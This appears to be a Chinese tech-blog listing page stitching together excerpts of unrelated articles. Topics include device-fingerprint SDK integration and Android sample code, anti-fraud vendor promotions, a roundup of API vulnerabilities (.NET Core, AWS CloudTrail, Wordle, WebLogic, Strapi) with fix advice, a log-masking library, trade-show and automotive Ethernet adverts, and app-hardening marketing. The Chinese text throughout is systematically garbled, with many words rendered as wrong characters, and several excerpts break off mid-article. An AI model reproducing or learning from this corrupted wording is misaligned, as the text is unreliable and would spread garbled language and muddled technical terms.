安全

根底篇请看：设施指纹系列--根底篇 咱们接着前文持续写对于设施指纹前端接入方面的内容。话不多说，间接步入正题。 咱们会在下文展现5种前端接入的形式，包含web接入、安卓接入、ios接入、微信小程序接入以及支付宝小程序接入。 Web接入第一步：引入在页面 HTML 中引入 const-id.js，代码形如： <script src="https://cdn.dingxiang-inc.com/ctu-group/constid-js/index.js"></script>因js文件会定期更新，为防止js生效影响您的应用，请不要将js下载到本地服务器上引入 第二步：生成并应用页面加载后，初始化设施指纹，须要在 JavaScript 中调用 _dx.ConstID(options, callback) 办法获取设施指纹token，代码形如： var options = { appId: '【这里填写 AppID】', // 惟一标识，必填 server: 'https://constid.dingxiang-inc.com/udid/c1', // constId 服务接口，可选 userId: '【这里填写 userID】' // 用户标识，可选};_dx.ConstID(options, function (err, token) { if (err) { // console.log('error: ' + err); return; } // console.log('const-id token is ' + token);});同时也反对Promise的用法 _dx.ConstID(options).then(function(token) { console.log(token)}).catch(function(err) { console.log(err)})options 字段阐明字段类型是否必填阐明appIdString是以后利用的标识serverString否constId 服务接口，可选，如不填，则默认会用云服务接口sceneString否场景标识，例如 login、survey 等userIdString否业务方的用户惟一标识，例如用户名、用户ID、手机号、Email等timeoutnumber否超时失败工夫，单位为毫秒cacheboolean否默认为 true，示意会缓存采集后果；改为 false 则每次会从新采集PC浏览器兼容浏览器最低版本IE8Edge20Chrome60Safari11Firefox6036010Sougou8QQ4挪动端浏览器兼容浏览器最低版本Chrome60UC12QQ8Safari11原生安卓4.0及以上安卓接入一、 环境要求条目阐明开发指标Android 4.0+开发环境Android Studio 3.0.1 或者 Eclipse + ADTCPU架构ARM 或者 x86SDK三方依赖无二、 集成SDK2.1 下载SDK点击下载SDK ...

电商、社区团购等新兴零售业态的冲击下，线下批发门店面临着客流量缩小、与年老生产人群需要脱节的增长瓶颈，传统零售商减速数字化转型。数字化扭转了经济与社会活动的载体、渠道、技术和效率，让批发服务流动更加灵便、麻利、智慧，让信息更丰盛更多维，设计出更贴近需要的产品和服务。在数字化转型和倒退中，传统批发企业面临多方面的挑战。例如，数字化让线下线上问题聚合交织，让业务运行更加简单，薅羊毛、刷单、炒信、数据爬取、盗用账户、窃取信息、团伙欺诈、养卡套现等危险层出不穷。不仅给企业带来经济损失，甚至影响到行业倒退，这就对了对企业的数字化的经营增长提出了更高要求。 京客隆多方面晋升数字化经营为了进一步晋升数字化经营能力，京客隆在近年来踊跃增强数字化技术和数据管理方面的投入。公司通过引入智能化设施和零碎，实现数据采集和剖析，优化门店布局、商品排列等方面的决策。同时，为适应新时代的生产需要，京客隆的新门店在保留原有劣势的根底上，更重视晋升消费者购物体验的舒适度和便捷性。还引入了挪动领取、无人超市等新型科技伎俩，让消费者更加不便地购物。京客隆还增强了与各方单干的数字化能力，以便更好地满足消费者需要。为了进一步保障线上业务的安全性，京客隆App和小程序部署顶象无感验证。顶象无感验证技术能够疾速精确地区分操作者是人还是机器，精准辨认欺诈行为，及时甄别出歹意账号，防止薅羊毛、批量注册的歹意攻打，实时监控并拦挡异样行为，保障用户购物的安全性。此外，相比传统的用户名和明码登录形式，无感验证能够缩小输出环节，让消费者更加不便地进行操作和登录，大幅晋升服务体验。在将来，京客隆将会进一步加强对全渠道行销的投入，继续加强数字化建设，晋升数据价值和服务价值，并进步业务经营效率和竞争力，并积极响应国家“碳达峰、碳中和”政策要求，助力推动绿色低碳循环倒退。北京京客隆商业连锁有限公司成立于1995年，是国内连锁超市行业的领跑者之一。其门店散布在北京、天津、河北、山西、辽宁等省市，总门店数已超过800家。京客隆还开明了线上购物平台，为消费者提供全渠道的购物体验。 业务平安产品：收费试用 业务平安交换群：退出畅聊

根底概念618还没开始，然而又如同曾经完结了......在这种电商大促的大节日前，电商行业客户个别会提前找到适合的设施指纹产品，去避免被“薅秃”。因为，黑灰产领有业余的设施牧场，通过应用模拟器、刷机改机等伎俩，批量、重复地利用终端设备作案。对互联网场景下的金融、电商等行业，进行歹意爬取、虚伪注册、账号盗用、薅羊毛、推广舞弊等其余歹意行为。 而设施指纹，通过用户上网设施的硬件、网络、环境等设施特色信息， 生成可抗黑产破解的设施惟一标识。作为纵深进攻风控体系下的重要工具，可实现对终端设备上的危险环境辨认、危险检测及行为危险剖析。 名称释义AppId公钥，长度为32位字符串，接入渠道惟一标识。开明服务后可在设施指纹的二级菜单“利用治理”中获取，AppId在客户端接入时应用。AppSecret私钥，长度为32位字符串，与公钥对应，开明服务后可在设施指纹的二级菜单“利用治理”中获取，请妥善保存，勿透露给别人 。AppSecret在后盾查问设施详情时应用。token设施指纹SDK采集上报后返回的标识，token不是设施指纹，通过token能够查问设施指纹hardId设施指纹用户前端Web端或集成SDK的Android端、iOS端用户后端指企业的后盾服务器交互流程 客户端接入，业务客户端须要集成指纹客户端SDK，包含安卓，iOS，H5，小程序等；通过客户端SDK能够获取到设施指纹token（注：token不是设施指纹）。业务接口扩大，业务客户端在须要设施指纹token的时候，能够通过相应的api获取到。业务接口须要把前端拿到的指纹token一并传入后盾。后盾接入，依据提供的后端SDK来查问设施详细信息，SDK涵盖Java，PHP等。PS：因终端用户的设施网络环境和设施版本等因素，设施指纹采集率并不能肯定达到100%，可能会存在极少局部未能失常采集到的状况。所以在集成指纹服务的时候，请尽量避免对指纹信息强依赖。 设施指纹的获取常见的设施指纹获取形式： User-Agent 字符串：在 Web 浏览器环境中，能够通过读取用户代理（User-Agent）字符串来获取设施信息，包含操作系统、浏览器版本等。例如，在 JavaScript 中，能够应用 navigator.userAgent 来获取 User-Agent 字符串。IP 地址：通过获取设施的 IP 地址，能够对设施进行初步的辨别。然而，IP 地址并非惟一标识设施的牢靠形式，因为多个设施可能共享雷同的 IP 地址（例如，通过 NAT 网络）。操作系统信息：设施的操作系统信息也能够用于构建设施指纹。在不同的操作系统中，可能有各种零碎调用、API 或命令能够获取该信息。浏览器或应用程序特色：能够通过查看浏览器或应用程序的特定特色来获取设施指纹。例如，在 Web 浏览器中，能够应用 JavaScript 检测浏览器的插件、字体、屏幕分辨率等信息。硬件信息：获取硬件信息也能够用于设施指纹的生成。例如，应用 JavaScript 能够读取设施的 CPU 信息、GPU 信息、设施的惟一标识符（如 Android 的 IMEI 或 iOS 的广告标识符）等。根底代码： import android.os.Build;import android.provider.Settings;import android.content.Context;import java.security.MessageDigest;import java.security.NoSuchAlgorithmException;public class DeviceFingerprint { // 获取设施指纹信息 public static String getDeviceFingerprint(Context context) { StringBuilder fingerprint = new StringBuilder(); // 获取设施的 Android ID String androidId = Settings.Secure.getString(context.getContentResolver(), Settings.Secure.ANDROID_ID); fingerprint.append(androidId); // 获取设施的序列号 String serial = Build.SERIAL; fingerprint.append(serial); // 获取设施的硬件信息 String hardware = Build.HARDWARE; fingerprint.append(hardware); // 获取设施的制造商和型号 String manufacturer = Build.MANUFACTURER; String model = Build.MODEL; fingerprint.append(manufacturer).append(model); // 获取设施的惟一标识符 String uniqueId = getUniqueId(); fingerprint.append(uniqueId); // 对设施指纹信息进行哈希解决 String hashedFingerprint = hashString(fingerprint.toString()); return hashedFingerprint; } // 生成设施的惟一标识符 private static String getUniqueId() { String uniqueId = ""; try { // 获取设施的惟一标识符（可依据需要自定义） // 例如，能够应用 IMEI（须要权限）或其余标识符 uniqueId = "YOUR_UNIQUE_ID"; } catch (Exception e) { e.printStackTrace(); } return uniqueId; } // 对字符串进行哈希解决 private static String hashString(String input) { try { MessageDigest digest = MessageDigest.getInstance("SHA-256"); byte[] hashBytes = digest.digest(input.getBytes()); StringBuilder stringBuilder = new StringBuilder(); for (byte b : hashBytes) { stringBuilder.append(Integer.toString((b & 0xff) + 0x100, 16).substring(1)); } return stringBuilder.toString(); } catch (NoSuchAlgorithmException e) { e.printStackTrace(); return ""; } }}以上。 ...

5月份的一些API安全漏洞报告,心愿大家查漏补缺,及时修复本人API可能呈现的破绽No.1 微软.NET Core破绽 破绽详情：微软官网发布公告称，其.NET Core 2.1、3.1和5.0版本中存在一个破绽（CVE-2023-31479），攻击者能够利用该破绽在受影响的零碎上查问、编辑、删除或增加文件（包含重要文件），从而导致系统被入侵的危险。破绽危害：微软.NET Core破绽CVE-2023-31479是一种门路遍历破绽。攻击者能够通过结构特定申请，利用此破绽在.NET Core 2.1、3.1和5.0版本中执行未经受权的文件读取、编辑、删除或增加操作。影响范畴：包含应用.NET Core 2.1、3.1和5.0版本构建的应用程序和服务。小阑修复倡议如果您应用.NET Core 2.1、3.1或5.0，请及时降级到已公布的修复版本。如果您无奈降级到较新版本的.NET Core，则能够思考施行其余安全措施，例如限度对服务器上敏感文件的拜访权限、禁用不必要的文件共享等。鉴于该破绽的重要性，小阑建议您评估零碎是否须要进行平安审核，以确认是否存在其余相干破绽。 No.2 对于AWS未记录的API安全漏洞 破绽详情：Datadog 的平安钻研人员发现了一个问题：AWS CloudTrail（一种日志记录服务）在 AWS 治理控制台中的体现与其余 AWS 服务不同。具体来说，它无奈像其余服务那样记录未被记录的 API 操作。这意味着有些 API 操作可能不会被 CloudTrail 残缺记录，从而导致日志信息不残缺。破绽危害：指攻击者能够利用AWS API中未记录的接口和性能，执行未受权的操作或拜访AWS资源。攻击者可能通过这种破绽来获取敏感信息、篡改数据、操纵零碎、滥用AWS资源等，导致企业蒙受重大损失。影响范畴：这个问题影响了一些与平安敏感相干的 API，它们波及到身份和拜访治理（IAM）申请。因为日志记录制度存在这个缺点，攻击者有可能调用这些 API 服务而不被发现。简略来说，这意味着有人能够在不留痕迹的状况下拜访一些敏感的平安信息，给零碎造成潜在危险。小阑修复倡议启用全面的日志记录：确保所有要害零碎和服务都启用了日志记录性能。这将有助于捕捉潜在的安全事件和异样行为。定期审查和更新：定期审查日志记录策略和监控设置以确保其充沛笼罩新的服务、资源和应用程序。依据组织的需要和政策进行更新。集中的日志治理：应用集中的日志治理解决方案来收集、存储和剖析日志。这有助于更容易地发现潜在的问题并放慢响应工夫。实时警报和告诉：依据要害指标和异样行为设置实时警报。及时理解潜在的安全事件，并采取相应措施。日志保留和备份策略：制订适合的日志保留和备份策略，确保日志信息可用且不易受损。适当的备份和归档能够防止数据失落。访问控制和权限治理：限度对日志文件和监控工具的拜访，确保只有通过受权的人员能够拜访和批改它们。培训和意识：培训员工和相干人员理解日志记录和监控的重要性，进步整个组织对于安全事件和异样行为的警觉性。定期审计和测试：定期对日志记录和监控策略进行审计，测试其有效性。这有助于发现潜在的破绽并确保策略始终保持最新。应用业余工具和服务：利用业余的日志记录和监控工具、服务以提高效率。 No.3 Wordle在线谜题API破绽 破绽详情：一位平安专家在《纽约时报》的在线游戏Wordle中发现了一个安全漏洞。这个破绽裸露了游戏每天呈现的谜题答案，并使得游戏的API（应用程序编程接口）容易受到黑客攻击。这位专家通过钻研Wordle网页版程序的API，找到了以后谜题和将来谜题的答案。他利用Chrome浏览器里的开发者工具查看申请，发现返回的JSON文件蕴含了以后谜题的后果。而且，将来几天的JSON文件名也被嵌入到这个文件中，让他能够发送API GET申请来获取将来几天的谜题答案。此外，他还发现能够向服务器发送POST申请，从而批改网站上的内容，比方扭转将来谜题的答案。这个破绽阐明，攻击者能够用简略的浏览器工具轻松地查看Web API，除了能通过API破绽获取谜题答案外，还有可能批改网站内容。破绽危害：Wordle在线谜题API的破绽危害是能够让攻击者通过暴力攻打或者其余伎俩轻易地获取到Wordle的正确答案，从而破解该谜题。这给玩家带来了肯定的不公平性，也可能升高Wordle的娱乐性和可玩性。影响范畴：次要是针对应用Wordle API的网站或应用程序，如果这些网站或应用程序没有做好平安防护措施，那么用户的Wordle答案就可能被泄露。小阑修复倡议倡议开发者应用更强的加密算法来爱护Wordle答案，并确保所有用户输出的数据都通过了严格的验证和过滤，以避免歹意输出。另外，还能够思考限度申请的速率，防止暴力攻打的产生。最好的状况是与Wordle API提供商分割，确保他们曾经修复了这个破绽，并且在更新后从新集成API。No.4 Oracle WebLogic Server破绽 破绽详情：Oracle WebLogic Server破绽（CVE-2023-3237）是一种近程代码执行破绽。攻击者能够通过结构特定的申请，利用此破绽在WebLogic Server中执行恶意代码并获取管理员权限，从而在受影响的零碎上施行窃密、篡改和毁坏等攻击行为。破绽危害：CVE-2023-3237破绽是一种重大的近程代码执行破绽。攻击者能够通过结构特定的申请，在未受权的状况下近程执行恶意代码，并齐全管制受感化的零碎和敏感数据。攻击者能够窃取敏感数据、加密数据而后要求赎金、篡改数据、毁坏零碎或植入后门等，这些都可能导致企业蒙受重大损失。此破绽也可能被利用来发动针对要害基础架构、重要应用程序和云环境等的定向攻打。影响范畴：该破绽可能影响到企业的重要业务零碎，应用如下版本的Oracle WebLogic Server是有影响的：14.1.1.012.2.1.4.012.2.1.3.0小阑修复倡议如果您的零碎运行了受影响的版本，请尽快装置官网公布的补丁程序。如果您无奈立刻装置补丁程序，则能够思考应用其余进攻措施，如禁用非必要的服务，敞开默认的Web控制台，限度对服务器端口的拜访等。对于一些必要的服务，如WebLogic治理控制台和T3协定端口，能够利用网络保护措施以限度其被攻打的危险。如果您曾经受到了攻打，应确保立刻采取措施进行革除，并参考Oracle的平安倡议来躲避危险。 No.5 Strapi身份验证绕过破绽 破绽详情：Strapi是一种灵便的、开放源码的无头CMS，开发者能够自由选择本人喜爱的工具和框架，编辑器也能够轻松地治理和散发内容。通过使治理面板和API可扩大通过插件零碎。Strapi呈现身份验证绕过破绽（CVE-2023-22893），Strapi 版本< 4.6.0中，当应用AWS Cognito login provider用于身份验证时，Strapi不会验证在OAuth 流程期间收回的拜访或ID令牌。近程威逼者能够伪造应用 "None"类型算法签名的ID令牌，以绕过身份验证并假冒任何应用AWS Cognito login provider进行身份验证的用户。破绽危害：高危，攻击者可利用以上破绽实现未经身份验证的近程代码执行。影响范畴：目前受影响的Strapi 版本：CVE-2023-22621：Strapi 版本<= 4.5.5CVE-2023-22894：3.2.1<= Strapi 版本< 4.8.0CVE-2023-22893：3.2.1<= Strapi 版本< 4.6.0小阑修复倡议官网已公布对应安全漏洞的修复版本，倡议受影响的用户及时降级防护，（或者降级至最新版本），对应修复版本如下：CNNVD-202304-1615 / CVE-2023-22621：Strapi 版本 >=4.5.6CNNVD-202304-1613 / CVE-2023-22894：Strapi 版本 >=4.8.0CNNVD-202304-1614 / CVE-2023-22893：Strapi 版本 >=4.6.0No.6  ...

我的项目介绍日志脱敏是常见的平安需要。一般的基于工具类办法的形式，对代码的入侵性太强，编写起来又特地麻烦。 sensitive 提供了基于注解的形式，并且内置了常见的脱敏形式，便于开发。 日志脱敏为了金融交易的安全性，国家强制规定对于以下信息是要日志脱敏的： 用户名手机号邮箱银行卡号明码身份证号长久化加密存储的时候下面的信息都须要加密，明码为不可逆加密，其余为可逆加密。 相似的性能有很多。不在本零碎的解决范畴内。 个性基于注解的日志脱敏。能够自定义策略实现，策略失效条件。内置常见的十几种脱敏内置计划。java 深拷贝，且原始对象不必实现任何接口。反对用户自定义注解。反对基于 FastJSON 间接生成脱敏后的 json变更日志变更日志疾速开始环境筹备JDK 7+ Maven 3.x maven 导入<dependency> <groupId>com.github.houbb</groupId> <artifactId>sensitive-core</artifactId> <version>1.0.0</version></dependency>外围 api 简介SensitiveUtil 工具类的外围办法列表如下： 序号办法参数后果阐明1desCopy()指标对象深度拷贝脱敏对象适应性更强2desJson()指标对象脱敏对象 json性能较好3desCopyCollection()指标对象汇合深度拷贝脱敏对象汇合 4desJsonCollection()指标对象汇合脱敏对象 json 汇合 定义对象UserAnnotationBean.java通过注解，指定每一个字段的脱敏策略。 public class UserAnnotationBean { @SensitiveStrategyChineseName private String username; @SensitiveStrategyPassword private String password; @SensitiveStrategyPassport private String passport; @SensitiveStrategyIdNo private String idNo; @SensitiveStrategyCardId private String bandCardId; @SensitiveStrategyPhone private String phone; @SensitiveStrategyEmail private String email; @SensitiveStrategyAddress private String address; @SensitiveStrategyBirthday private String birthday; @SensitiveStrategyGps private String gps; @SensitiveStrategyIp private String ip; @SensitiveStrategyMaskAll private String maskAll; @SensitiveStrategyMaskHalf private String maskHalf; @SensitiveStrategyMaskRange private String maskRange; //Getter & Setter //toString()}数据筹备构建一个最简略的测试对象： ...

2023年6月14日到16日，当先的DevSecOps解决方案提供商龙智将在2023上海国内嵌入式展（embedded world China 2023）A055展位亮相。首次参展，龙智为企业带来全面的嵌入式行业解决方案，集成Helix Core、Helix QAC、Klocwork、Helix ALM、Methodics IPLM、TestComplete和ReadyAPI等产品，笼罩动态代码剖析、版本控制、自动化测试以及生命周期治理畛域，帮忙企业实现合规、可追溯、高效优质、繁多可信数据源的嵌入式软件开发。 立刻收费报名，并预约龙智专家>>> 本篇文章咱们将聚焦嵌入式开发中可追溯性的挑战，介绍咱们带来的解决方案和客户实例，帮忙您的嵌入式开发团队创立残缺、可追溯的开发流程。 可追溯性在嵌入式开发中至关重要嵌入式零碎须要证实其合乎性能平安要求，尤其是汽车、航空航天和医疗设施等行业的企业。在这些行业中，性能平安要求没有容错的余地，行差踏错就有可能酿成大错。对嵌入式零碎进行测试能够验证其是否满足要求，跟踪测试并记录后果能证实其是否合规。因而，跨产品生命周期的可追溯性的重要性就显而易见了。 嵌入式开发的挑战在嵌入式开发中，你可能会面对这些问题： 不足全面的可追溯性：嵌入式团队难以全面理解开发过程中的变更、决策和问题，也无奈追溯到特定的需要、测试用例或设计决策，导致团队效率低下，并影响产品的性能和品质。信息量过载：嵌入式零碎开发波及多个信息源的继续输出。大量的流动、变更和文档须要跟踪、记录和响应，波及许多相干人员，如果应用孤立的工具，将无奈无效治理。不统一的信息管理：不同的团队以不同的形式应用不同的工具存储和治理信息。这导致了信息无奈对立、难以查找和剖析。流程不主动且难以合作：许多公司依然应用手动流程、动态文档和其余孤立的、扩散的零碎来跟踪外围开发过程和流动，从而减少了研发老本。这种办法往往效率低下，容易出错，并且难以实现全面的合作和信息共享。生命周期治理：创立一个残缺、可追溯的开发过程此次展会上，龙智将带来的嵌入式行业解决方案，集成了Perforce旗下两款生命周期管理工具Methodics IPLM和Helix ALM，帮忙您克服上述全副挑战。 利用生命周期治理：Helix ALM是在整个周期中用于应用程序生命周期治理的最佳ALM软件，这是因为它领有针对需要治理、测试用例治理和问题治理的专门模块，为嵌入式开发团队提供了整个生命周期的端到端的可追溯性，帮忙团队随时跟踪需要、测试和问题。通过应用Helix ALM，您将确保按时公布高质量的版本，可能轻松满足规定的规范。 Helix ALM的可配置性和性能曾经证实它足以满足咱们所有的业务需要。——Wilkin Chan，网络管理员Database Consultants Australia（DCA） IP治理：Methodics IPLM是一个可扩大的IP生命周期治理平台，能够跨我的项目跟踪IP及其元数据，提供端到端的可追溯性，并轻松实现IP重用，帮忙您治理芯片零碎（SoC）设计中快速增长的复杂性，放慢产品设计，减速上市。 咱们意识到咱们须要一个零碎来帮忙治理现有的IP，并反对IP复用的最佳实际。Methodics提供了一个弱小的解决方案，通过提供一个合作平台，帮忙咱们更高效、可继续、可扩大地进行IP复用。——Rick Stawicki，执行董事兼EDA工程师Maxim Integrated这些工具帮忙团队追溯和了解开发过程中的所有要害决策、变更和问题，为嵌入式开发团队提供了更好的可控性、可靠性和合规性。 欢送光临龙智A055展位,实现合规、可追溯、高效优质、繁多可信数据源的嵌入式软件开发除了生命周期管理工具，龙智此次也将在展会上出现版本控制、动态代码剖析以及自动化测试等解决方案，帮忙企业实现合规、可追溯、高效优质、繁多可信数据源的嵌入式软件开发。 十分期待在2023上海国内嵌入式展上与更多的企业分享龙智的教训和解决方案。欢送各位来宾届时光临龙智A055展位，与龙智专家面对面交换，探讨嵌入式开发中的挑战、解决方案及最佳实际。现场还有业余报告和精美礼品附赠。 [立刻获取收费参展机会](https://jinshuju.net/f/LOtt3p?x_field_1=sf)

在将来几年，汽车线束将从不同协定的异质网络转变为分层的同质以太网网络。在这种新状况下，模仿实在车辆网络的实验室测试台须要剖析工具，以反对它们在车内通信过程中进行验证。 汽车向以太网聚合起因 随着汽车外部技术变得越来越简单，相互间的分割变得越来越严密，最新的应用程序和性能正在对带宽、提早、同步、高可用性、QoS和降低成本提出更高的要求。而以后和传统上在汽车畛域应用最宽泛的协定（如CAN、LIN、MOST、FlexRay等）已不再能满足这些行将到来的需要。在这种状况下，以太网在IVN（车载网络）畛域就显示出了它领先地位，因为与上述其余协定相比，以太网具备许多劣势（见下表）。 表1 汽车畛域中最罕用协定的简要比照 与许多其余畛域（航空航天、铁路、工业自动化等）一样，以太网的聚合在汽车畛域也成为事实。MarketsAndMarkets预计，到2024年，汽车以太网市场将从2019年的16亿美元增长到44亿美元。Frost&Sullivan示意，到2022年，汽车以太网端口的总数预计将高于所有其余以太网端口的总和。汽车IVN体系结构演变从历史上看，汽车中的电子系统被划分为几个“畛域”（次要是能源总成、底盘、车身、舒适性和诊断）。但近年来呈现了一些新的“畛域”，如信息娱乐、驾驶员辅助、车载体验、C-V2x、雾和云后端等。图1“地方网关+域控制器”架构 在传统办法中，每个域都基于一个专用的ECU（电子管制单元），有一个独立的控制系统，是用于域内每个特定次要性能。现在，域之间有了更多的交互和依赖，但它们通常依然有独立的控制系统。此外，因为历史问题，大多数传统域内的通信依然基于非以太网协定。因而，“地方网关+域控制器”架构是将来汽车中最罕用的架构之一。 如上图所示，这种基于地方网关的新型架构须要一个基于以太网的主干网（所谓的“聚合主干网”），连贯散布在整个汽车中的所有不同域。该地方网关是一种以太网多端口路由器/交换机，具备额定的车辆管制级别性能。同时，有一个特定于域的网关将每个域与以太网骨干网连接起来。当域内的协定也是以太网时，该域网关就变成了一个域交换机，因为它以某种形式作为惯例以太网交换机运行。 将来几年，汽车线束将从不同协定的异质网络（CAN、LIN、MOST、FlexRay等）转变为分层同质以太网网络。这种变动将使汽车外部的通信更加高效和对立。 挑战 一家Tier1公司开发一种新的域网关，用于将驾驶员辅助零碎和信息娱乐域连贯到车内的聚合骨干网络。这两个域应用一个独自的域网关，因为它们都属于一个汽车宏观性能，即ADAS服务。 这些域中应用的协定是反对AVB音频视频桥接的以太网。在这种状况下，域网关扮演着一个具备特定和应用程序定制性能的多端口以太网交换机的角色，例如以太网AVB反对。以太网上的AVB是对IEEE802.1标准的一组扩大，它使本地以太网可能应用传输工夫并损失敏感的音频/视频数据。 图2 多端口以太网域网关 在该域网关的验证过程中，一旦在实验室测试台上反馈实在的车辆网络，该公司就面临如下问题：● 须要在测试台上记录流量，以便为域网关的模仿模型提供尽可能实在的流量。● 须要在特定条件下记录特定的帧/数据包。例如，假如须要在IEEE802.1AS 立体上记录特定工夫标记之后的所有IEEE802.1Qat帧。 出于这些目标，不仅有必要记录流量，而且有必要将工夫戳与任何记录的数据包一起保留，并可能实时过滤和解析网络局部中的流量。 解决方案 为了满足汽车行业的相似需要，Relyum推出了RELY-REC，这是一种高度专业化的剖析工具，可无缝捕捉以太网流量，并可记录所有存储信息的工夫戳。 图3 RELY-REC流量记录器外观 RELY-REC作为独立的设施以低功耗紧凑的构造嵌入了监督、过滤、工夫戳和捕捉最简单以太网网络流量的所有逻辑。对于本文档中形容的特定用例，RELY-REC将以TAP模式装置在“被测网络”网络链路中，容许通过其服务端口同时近程检索记录的流量（PCAP格局）。 图4 RELY-REC TAP配置 论断第一个论断是以太网交融在汽车网络中曾经成为事实。因而，在汽车网络中对新设施的验证和集成提出新的需要：● 一致性测试。其目标是验证协定的一致性和互操作性，包含汽车堆栈和组件的TCP/UDP/IP一致性测试。● 协定验证和性能测试。其次要目标是验证基于数据立体的应用程序性能，以及较低级别的同步立体精度和行为。● 地方网关和域网关以太网替换功能测试；AVB能力，取得每个服务类别（Qos）预期丢包、带宽和提早、链路故障后的切换和聚合工夫、某些节点行为不当状况下的行为等。将这些要求转化为更精确的测试项：● 查看网络中传输的实时流量● 过滤动静流量● 收集实时数据，依据车辆同步立体打工夫戳（如IEEE 802.1AS）● 基于多个可配置的用户定义事件触发数据捕捉操作● 将数据保留到数据记录器外部，而后传输到PC进行前期剖析。 图 5 RELY-REC 触发条件和动作配置示例 RELY-REC是一款由Relyum开发的独立数据记录设施，合乎上述所有性能。另外它是一种反对TSN的设施，为汽车IVN网络的下一步测试服务。 RELY-REC设施 在要害零碎中，可能在帧级别剖析网络通信以进行测试和取证是至关重要的。此外，这种剖析的有效性将受到基础设施将帧与公共工夫参考相关联的能力的限度。为此，Relyum开发了RELY-REC，这是一种可能查看、标记和记录惯例以太网和TSN以太网流量的设施，应用与所剖析网络雷同的IEEE802.1AS协定。 该设施次要长处是其适应性强，可实用于任何场景，这要归功于其多媒体多速率以太网端口，该端口基于SFP模块，反对汽车行业中应用各类接口。 该设施包含一个弱小的触发工具，能够依据嵌套条件（AND、OR）定义触发器，并将多个操作链接到一个触发器。 反对多种输出类型的条件（模仿/数字输出信号、来自第三方零碎的告警和信号、时间表、同步失落、数据包查看），并连贯到输入操作（流量记录、电子邮件告诉、SNMP陷阱、syslog音讯、告警输入）。 为了简化对存储流量的拜访，RELY-REC反对用于存储优化和高效监控的可配置过滤器。这些过滤器能够由最终用户基于Wireshark语义进行定制，也能够应用基于第2层和第3层的预约义字段。 此外，RELY-REC容许通过服务端口近程拜访外部存储的记录。设施中提供的带有工夫戳的事件日志简化了触发器与相应记录的相关性。 具体技术参数请拜访：www.softtest.cn 邮箱：contact@watertek.com 电话：01082695188

昨天五月天的票一进去，朋友圈一片腥风血雨，每个人都在哀嚎没有抢到票 当初大家满世界在抵制黄牛，然而就黄牛的伎俩，咱可差远了 “黄牛”还有一个别称是“黑灰产”，而黑灰产从业者具备较强的组织性、流传性和信息感知度。以营销流动脚本舞弊场景为例，黑灰产滥用平台的各种营销流动机制，如新人处分、用户裂变拉新处分、签到处分、秒杀优惠等，利用批量账号和自动化软件脚本（产生大量机器流量），绕过平台设定的限度规定，以千里之行;始于足下的形式，大量地获取营销流动礼包， 而后将现金汇集到对立账号，或将红包、优惠券、电子券等以不同形式进行变现获利。而且黑灰产逐步造成一条分工明确、单干严密的黑灰产业链条。 实名制目前主办方采取的次要伎俩是实名制，咱们来看看个别实名制的伎俩是什么： from flask import Flask, render_template, request, sessionapp = Flask(__name__)app.secret_key = 'your_secret_key'# 模仿已注册用户信息registered_users = { 'user1': { 'name': '张三', 'id_number': '1234567890' }, 'user2': { 'name': '李四', 'id_number': '9876543210' }}@app.route('/')def home(): return render_template('home.html')@app.route('/buy_tickets', methods=['POST'])def buy_tickets(): # 获取用户输出的姓名和身份证号码 name = request.form['name'] id_number = request.form['id_number'] # 检查用户信息是否匹配 for user, info in registered_users.items(): if info['name'] == name and info['id_number'] == id_number: # 用户信息匹配，执行购票逻辑 # TODO: 在此处编写购票逻辑的代码 return "购票胜利！" # 用户信息不匹配，提醒用户从新输出 return "姓名和身份证号码不匹配，请从新输出！"if __name__ == '__main__': app.run()实名制购票要求购票者提供无效身份证明，并将购票者的姓名与身份证信息进行核查。这样能够确保每个人只能购买肯定数量的门票，缩小黄牛批量购票的可能性。 ...

作为乙方，或者说作为打工人，甲方以及老板常常会问，“咱们软件的安全性怎么样？”“能做到百分比平安吗？”“咱们怎么能力让软件百分比平安？”...... 诸如此类的问题，往往让咱们胸闷气短，在这里，我教大家一招：与其精力内耗本人，不如发疯外耗他人。咱就间接坦荡荡通知他：老板，能够的，这取决于你能拿出多少钱来！微笑.jpg 话说回来，平安界最根底的一条定律：平安无相对。也就是说，平安其实绝对的（废话），实际上很多伎俩都是在进步破解的老本，升高破解的性价比。 那么咱们如何进步软件的绝对平安呢？目前业界采取的比拟多的一套组合拳是加固+代码混同+加密SDK。咱们接下来一一来介绍一下。 开始之前，咱们先来看一下目前黑灰产的攻打伎俩 技术的倒退，带来的成果是双面的，一方面让咱们的进攻伎俩降级，而另一方面，也让黑灰产的伎俩更加先进。因而，面临各类场景的欺诈危险，咱们须要建设纵深入进攻体系。 ios加固爱护iOS加固爱护是能够对iOS App/动静库/动态库中的代码进行深度混同、加固，并应用独创的虚拟机技术对代码进行加密爱护，使软件无奈被间接进行逆向、破解。在这个计划中，能够从6个方面进行加固：（具体代码见：iOS加固爱护新思路） 1.代码虚拟化： 将原始化代码编译为动静的DX-VM虚拟机指令，运行在DX虚拟机之上，无奈被反编译回可读的源代码。 2.代码混同： 将原始代码的控制流进行切分、打乱、暗藏、插入花指令、将代码逻辑复杂化而不影响原始逻辑。进步App store上架机率。 3.防调试： 为App提供运行时防调试能力，避免攻击者通过调试来动态分析App的逻辑。 4.字符串加密： 把代码中定义的动态常量字符串进行加密，运行时解密，避免攻击者通过字符串进行动态剖析，猜想代码逻辑。 5.防反编： 译无效避免攻击者应用逆向剖析工具将二进制代码反编译为伪代码（Pseudo-Code）,如IDA的F5性能。 6.防篡改： 避免应用程序中的代码及资源文件被歹意篡改，杜绝盗版或植入广告等二次打包行为 Android加固爱护Android加固爱护别离从代码平安、资源文件平安、数据安全和运行时环境平安维度提供平安爱护。同时针对每个维度又进行了不同档次的划分，加固策略可根据理论场景进行定制化调配，平安和性能达到均衡。 1.DEX文件爱护： 通过应用DEX壳、JAVA代码反编译、JAVA指令虚拟化、JAVA字符常量加密等技术对DEX文件进行全面性爱护。 以壳爱护为例： 加固前： 加固后： 2.SO文件爱护： 通过对SO文件进行反编译、防篡改、防盗用、虚机爱护、代码压缩等技术对SO文件进行全面性爱护。 3.资源文件爱护： 对利用中的资源文件以及JS文件进行加密爱护和防篡改爱护。 1）资源文件加密爱护： 2）JS文件爱护 3）资源文件防篡改爱护 4.运行时爱护： 对利用的运行环境进行实时检测，爱护利用运行在平安的环境中。 5.数据文件爱护： 对利用应用到的本地文件、数据库、配置文件进行加密爱护。 端平安加固：H5代码混同H5代码混同是对H5代码进⾏加密、混同、压缩，能够⼤⼤减少H5代码的安全性，无效防⽌产品被⿊灰产复制、破解。 AST：形象语法树（abstract syntax tree），源代码的形象语法结构的树状表现形式 加密前： 加密后： 白盒加密SDK：通信加密一般加密： 